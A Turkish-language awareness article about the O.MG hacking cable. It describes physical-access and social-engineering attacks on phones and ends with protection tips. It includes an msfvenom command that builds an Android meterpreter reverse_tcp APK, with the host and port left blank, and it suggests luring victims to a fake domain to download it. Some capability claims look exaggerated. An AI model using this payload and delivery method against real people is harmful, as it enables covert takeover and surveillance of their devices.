OMG kablo görüntü olarak normal bir USB Micro kablo gibi duruyor ama değil. OMG kablo cihazınızdaki tüm verileri kaydediyor ve 1609 KM kadar uzaktaki bir bilgisayar korsanına bu bilgileri tamamıyla aktarabiliyor.
Sadece OMG kablo ve bir router aracılığıyla hedefin whatsapp mesajları, smsleri, arama kayıtlarını öğrenmek mümkün. Hatta hedefe başkası adına sms bile atılabiliyor. Bundan dolayı şüpheli ağlardan ve kablolara karşı dikkatli olmak gerekiyor.
Peki ya nasıl hackliyorlar ?
Bilgisayar korsanları bir şekilde sizin verilerinizi elde etmek istediği cihaza fiziksel erişimi olması lazım. Bu fiziksel erişimi sosyal mühendislik vb. herhangi bir yolla yakaldıktan sonra o arada o kabloyu takmasıyla birlikte tüm iş bitiyor. OMG kabloda bir wifi bağlantı noktası bulnumaktadır. Yani kablo uzaktan bağlanılabilir bir kablo. Hackerlar bu kabloyu hedef cihaza taktıktan sonra bağlantı noktası oluşturup size zararlı yazılımı indirtiyorlar., sonrasında kablonun takılı olup olmaması pek de fark etmiyor. Henüz ismini bu sektörle alakası olmayan insanlara yeni yeni duyuran bu siber güvenlik ve hacking kabloları, usb ve adaptörleri herkes için tehdit, çünkü normal kullanıcıların bu tehditlere karşı korumaları bulunmamakta.
OMG Kabloya bağlantı nasıl sağlanıyor:
Bu sektörle ilgilenenlerin yakından tanıdığı bir msfvenom komutu ile sağlanabiliyor.
[msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o omg.apk ] Bu komutu yazmakla iş bitmiyor bu komut ile zararlı bir dosya oluşturuyoruz, kablo cihaza takılıyken bu dosyayı karşı tarafa bir şekilde indirtilmesi gerekiyor. Bu dosyayı indirtmek için herhangi bir sahte domain oluşturulabilir. Siz bunu yiyip bu dosyayı indirdikten sonra iş bitmiş oluyor. Artık durumun farkına varıp kabloyu çıkarsanız bile nafile çünkü meterpreter session'u açılmış olacak ve istenildiği zaman cihazınıza tekrardan giriş yapılabilecek.
Bu saldırılardan korunma yöntemleri:
-
Sahte wifilere dikkat! Saldıran kişiler cihazları ile sahte bir wifi noktası oluşturabiliyor. Örneğin bir cafenin şifresiz bağlanılan wifi ağı. Siz bu wifi ağına bağlandığınızda size erişim sağlanabiliyor. Bu yüzden şüpheli wifilerden uzak durmak gerekiyor.
- Dışarıdan gelen şüpheli kablolara dikkat etmek gerekir. Aynı zamanda cihazlarınızı ( örn: telefonunuz ) yanınızda taşımanız, saldırganın o kabloyu takacağı aralığı vermemeniz önemli.
